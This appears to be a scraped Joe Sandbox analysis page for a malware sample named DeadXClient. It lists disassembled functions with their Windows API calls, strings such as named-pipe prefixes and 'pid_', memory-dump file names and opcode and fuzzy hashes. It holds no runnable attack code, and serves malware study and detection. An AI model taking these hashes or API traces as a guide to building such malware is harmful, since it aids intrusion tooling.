                                                                                                                                                                                  • API String ID: 517849248-0
                                                                                                                                                                                  • Opcode ID: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                                                                                                                                                  • Instruction ID: e84dfc3b32cb20bbf400105a3cd08fc0406acf207ffcdad00dd67069a0932502
                                                                                                                                                                                  • Opcode Fuzzy Hash: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 97015731344E4082EB10CB53A85879AA2A6F788FC8F548235DE8A43719DF7CD58AC750
                                                                                                                                                                                  Function 1C5919D8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FinalHandleNamePathlstrlen
                                                                                                                                                                                  • String ID: \\?\
                                                                                                                                                                                  • API String ID: 2719912262-4282027825
                                                                                                                                                                                  • Opcode ID: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                                                                                                                                                  • Instruction ID: 58d313475246d29930ef77139524b1af55824e2ee5b595136afb7503d95cd6db
                                                                                                                                                                                  • Opcode Fuzzy Hash: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8CF06272348A8192FB208F66F89479AA721F754BC8F809125DA4947959DFBCD68DCB00
                                                                                                                                                                                  Function 1C59A258 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                  • Opcode ID: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                                                                                                                                                  • Instruction ID: a62737a03a1c29e391349a5a7dc52a72e79846251ae13e3abb6830c74525cb83
                                                                                                                                                                                  • Opcode Fuzzy Hash: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 60F0A071722F0081FF088FA2F888BA92761FB88F44F842619940B47266DF7CD0C8C320
                                                                                                                                                                                  Function 1C5954F0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 1C595576
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentThread
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2882836952-0
                                                                                                                                                                                  • Opcode ID: 5eb0f69eaa28739e7a3b5d30c3b7e3077147b945ee367a274f52b7d5e5995563
                                                                                                                                                                                  • Instruction ID: 4ce0ddea85ca3c7b9bfba1fa37b6f4cab2a343be5a3c24eaad13bc3ac1f03ab1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5eb0f69eaa28739e7a3b5d30c3b7e3077147b945ee367a274f52b7d5e5995563
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5CF1E336619B84C6DB50CB5AF49035ABBA1F3C5B98F504216EB8E87B68DF7CC494CB10
                                                                                                                                                                                  Function 1C5A0980 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 1C5A09C2
                                                                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C5A093F,?,?,?,1C59E263), ref: 1C5A0A80
                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C5A093F,?,?,?,1C59E263), ref: 1C5A0B0A
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2210144848-0
                                                                                                                                                                                  • Opcode ID: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                                                                                                                                                  • Instruction ID: 90b831d33b8a35511399994999237c6c46cd91327c39e647f6c960dcf7c8be37
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E71CE32B31A5999E7009F63D9907AE67A1F7C8B98F804616CE0B67B54DB38D087C334
                                                                                                                                                                                  Function 1C593558 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • StrCmpNW.SHLWAPI ref: 1C59357A
                                                                                                                                                                                  • StrStrW.SHLWAPI ref: 1C593594
                                                                                                                                                                                  • StrToIntW.SHLWAPI ref: 1C5935BB
                                                                                                                                                                                    • Part of subcall function 1C591934: OpenProcess.KERNEL32 ref: 1C59195A
                                                                                                                                                                                    • Part of subcall function 1C591934: K32GetModuleFileNameExW.KERNEL32 ref: 1C591978
                                                                                                                                                                                    • Part of subcall function 1C591934: PathFindFileNameW.SHLWAPI ref: 1C591987
                                                                                                                                                                                    • Part of subcall function 1C591934: lstrlenW.KERNEL32 ref: 1C591993
                                                                                                                                                                                    • Part of subcall function 1C591934: StrCpyW.SHLWAPI ref: 1C5919A6
                                                                                                                                                                                    • Part of subcall function 1C591934: CloseHandle.KERNEL32 ref: 1C5919B4
                                                                                                                                                                                    • Part of subcall function 1C593C70: StrCmpNIW.SHLWAPI(?,?,?,1C59255A), ref: 1C593C88
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                                                                                  • String ID: pid_
                                                                                                                                                                                  • API String ID: 517849248-4147670505
                                                                                                                                                                                  • Opcode ID: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                                                                                                                                                  • Instruction ID: d406a89e79c95e768200a9a7f9b994114dbd4c58b54cbde7d4532f649acb5ce0
                                                                                                                                                                                  • Opcode Fuzzy Hash: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 93110635300B81D1FB00DB27E80439A6362FB88B80F5152A5CE4DC3755EF39D559C760
                                                                                                                                                                                  Function 1C5914A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Heap$Process$Free
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3168794593-0
                                                                                                                                                                                  • Opcode ID: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                                                                                                                                                  • Instruction ID: 47cd2fbf23e108646f71a6d32c111bfb5364c74bd7abe6e640446015d8c58fb9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 81011A72651F90C6E704DFA7E80878AB7A2F78CF88F084525EB4A53729DE78D095CB40
                                                                                                                                                                                  Function 1C592618 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileType
                                                                                                                                                                                  • String ID: \\.\pipe\
                                                                                                                                                                                  • API String ID: 3081899298-91387939
                                                                                                                                                                                  • Opcode ID: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                                                                                                                                                  • Instruction ID: 3ea88cbeff97c70ccd460cb4bd7843b1d9be821cc794b0eb4c6cf01fa8a4f91a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D61B036640B8286EB24CF27AC503EA67A5F7C9BC4F54016ADE4A53B18DF38D646C720
                                                                                                                                                                                  Function 1C592408 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileType
                                                                                                                                                                                  • String ID: \\.\pipe\
                                                                                                                                                                                  • API String ID: 3081899298-91387939
                                                                                                                                                                                  • Opcode ID: 15f2f4e0f9d638f158a96525c1ecafbceb1b9e2c8075581ad63209208a78af1e
                                                                                                                                                                                  • Instruction ID: 26fa927e2eb91a6b86e8afa17279fbebd867243e1ea42263bffa0510e55c29b2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 15f2f4e0f9d638f158a96525c1ecafbceb1b9e2c8075581ad63209208a78af1e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E41D33660A7C5C2DA24DF26B8643EB7725F3C57C0F5401A5CE8A47B1AEE3AD548CB90
                                                                                                                                                                                  Function 1C5995F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RtlPcToFileHeader.NTDLL ref: 1C599634
                                                                                                                                                                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,1C5984FB), ref: 1C59967A
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                                                                  • Opcode ID: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                                                                                                                                                  • Instruction ID: 9fec09c53ec8b7030015b77889f59fffbf2eba9bbbf7c849148acbd59f7fb32f
                                                                                                                                                                                  • Opcode Fuzzy Hash: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C111832619B8182EB118F26F440349B7A5F788F98F288265EF8D07B69DF7DC591CB00
                                                                                                                                                                                  Function 1C591C28 Relevance: 5.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Heap$Process$AllocFree
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 756756679-0
                                                                                                                                                                                  • Opcode ID: 25d11f289d9fbfcfef02ead22fd34e1bae26a1daa0a4a5c4d43c16fe266dba3e
                                                                                                                                                                                  • Instruction ID: 9691abdf26db390cf31098e4d9ab15b4dbc43e1bf176a915a7ebc1092be1370e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 25d11f289d9fbfcfef02ead22fd34e1bae26a1daa0a4a5c4d43c16fe266dba3e
                                                                                                                                                                                  • Instruction Fuzzy Hash: AD11A572A55F9081EB05CBA6A40429AB7A1FBC8FA4F594324DE99537A4EF78D082C740
                                                                                                                                                                                  Function 1C591268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1617791916-0
                                                                                                                                                                                  • Opcode ID: f083a3077c0b1c945921efc18f57caeeb55b99edd70e436b0099e2dca6254ff4
                                                                                                                                                                                  • Instruction ID: d8ef271a099474a01fe52cf671dd993ac43e6c623026be89aaa9410bf9323068
                                                                                                                                                                                  • Opcode Fuzzy Hash: f083a3077c0b1c945921efc18f57caeeb55b99edd70e436b0099e2dca6254ff4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4FE065B1A41A0086F7088FA3D80C78977E2FB88F09F08C124C90907361DFBDD4D98B80
                                                                                                                                                                                  Function 1C591000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1617791916-0
                                                                                                                                                                                  • Opcode ID: 8415c691aaee8c46f1d02063215c92c698de3b3fb4a93955248209b4c764c50b
                                                                                                                                                                                  • Instruction ID: 60b1dcc383803c18ca8a10a4c7ef50cea8e72fd45820bea60f8379b7bc945cb7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8415c691aaee8c46f1d02063215c92c698de3b3fb4a93955248209b4c764c50b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8BE01AB1651A4087F7089F63D80879977E2FB8CF19F488124C90907321EE7CE4D9CB10